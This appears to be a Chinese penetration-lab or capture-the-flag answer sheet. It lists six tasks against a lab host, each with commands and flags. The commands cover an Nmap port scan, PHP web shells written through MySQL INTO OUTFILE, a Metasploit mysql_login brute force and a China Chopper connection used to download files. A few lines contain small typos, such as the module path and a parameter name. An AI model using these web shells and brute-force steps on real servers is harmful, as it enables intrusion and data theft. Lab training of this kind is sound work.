1.利用渗透机场景kali中的工具确定MySQL的端口,将MySQL端口作为Flag提交;
Nmap -sV -p- 172.16.101.243
flag{3358}
2.管理者曾在web界面登陆数据库,并执行了
{select ‘<?php echo ';system($_GET[\'cmd\']); echo '; ?>’ INTO OUTFILE ‘C:/phpstudy/test1.php’}
语句,结合本执行语句使用dos命令查看服务器的详细配置信息,并将服务器的系统型号作为Flag提交;
http://172.16.101.243:8081/test1.php?cmd=systeminfo
flag{Bochs}
3.利用渗透机场景kali中的msf工具使用root目录下password.txt字典文件破解MySQL的密码,并将破解MySQL的密码所需的模块当作Flag提交(账户为root);
use auxiliary/scanner/msql/mysql_login
set RHOSTS 172.16.101.243 设置靶机ip
set USERNAME root 用户
root set PASS_FILE /root/password.txt 密码字典
set RPORT 3358 靶机mysql端口
flag{mysql_login}
4.利用渗透机场景kali中的msf工具使用root目录下password.txt字典文件破解MySQL的密码,并将MySQL的密码当作Flag提交(账户为root);
flag{zxcvbnm}
5.利用上题中的数据库账户密码在登陆数据库,通过select ‘<?php @eval($_POST[admin]);?>’************ 'C:/phpstudy/shell.php’语句向服务器提交名为shell.php的一句话木马,将语句中*号的明文作为Flag提交(*为大写字母或者空格);
mysql -h 172.16.101.243 -P 3358 -u root -p 登录mysql
select ‘<?php @eval($_POST[ad,om]);?>’ INTO OUTFILE ‘C:/phpstudy/shell.php’;
flag{INTO OUTFILE}
6.使用菜刀连接上题中的shell.php,下载服务器根目录下的压缩包,将压缩包中的Flag提交;
菜刀连接,下载flag.zip
flag{huaixiaohai}